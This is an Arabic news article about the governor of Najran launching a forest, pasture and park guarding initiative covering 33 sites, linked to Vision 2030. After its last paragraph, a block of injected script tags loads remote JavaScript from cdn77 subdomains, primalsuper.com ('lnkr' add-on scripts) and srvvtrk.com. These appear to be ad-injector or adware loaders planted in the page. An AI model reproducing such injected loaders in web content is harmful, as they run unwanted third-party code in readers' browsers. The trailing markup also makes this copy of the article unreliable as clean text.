شكرا لقرائتكم خبر عن تدشين مبادرة حراسة الغابات والمراعي بنجران والان نبدء بالتفاصيل

دشن الأمير جلوي بن عبدالعزيز بن مساعد أمير منطقة نجران أمس، مبادرة حراسة الغابات والمراعي والمتنزهات بالمنطقة، التي تعد ضمن مبادرات وزارة البيئة والمياه والزراعة، المستهدفة لبرنامج التحول الوطني 2020، لتحقيق الأمن المائي والغذائي بالمملكة ورفع كفاءة الخدمات المختلفة، والمحافظة على البيئة لتعزيز التنمية المستدامة وصولاً إلى تجسيد رؤية المملكة 2030.

وأزاح سموه الستار عن لوحة التدشين، من إحدى المراعي النباتية شرقي منطقة نجران، واستعرض المواقع التي تشملها الحراسة في المرحلة الأولى، في إيجاز قدمه مدير عام فرع وزارة البيئة والمياه والزراعة منصور الشمراني، الذي عدد 33 موقعاً بالمنطقة ومحافظاتها، تمثل المواقع المعنية بحراستها، مؤكدا أهمية المبادرة في صون الثروات الطبيعية والبيئية التي تزخر بها المملكة، والحفاظ عليها للاستخدام الفعلي والعادل في الوقت الحالي، وتأمينها للأجيال القادمة.

وبين مدير فرع وزارة البيئة والمياه والزراعة أن هذه المبادرة تهدف إلى تحقيق التنمية المستدامة للمراعي والغابات وتنظيم الاستثمار بها، ومكافحة التصحر، وحماية المراعي والغابات من التعدي والتدهور، إضافةً إلى تعزيز الاستثمار بالقطاع البيئي من خلال تأسيس شركة وطنية تشرف عليها الوزارة لإدارة وتأجير بعض المراعي والغابات وتنميتها، وتنظيم الاستثمار بها. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_425196340&key=1fd3b038f796d0b159&cv=1549548579&t=1549548579854" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_335432619&key=1fd3b038f796d0b159&cv=23441&t=1549548579855" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549548579859" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********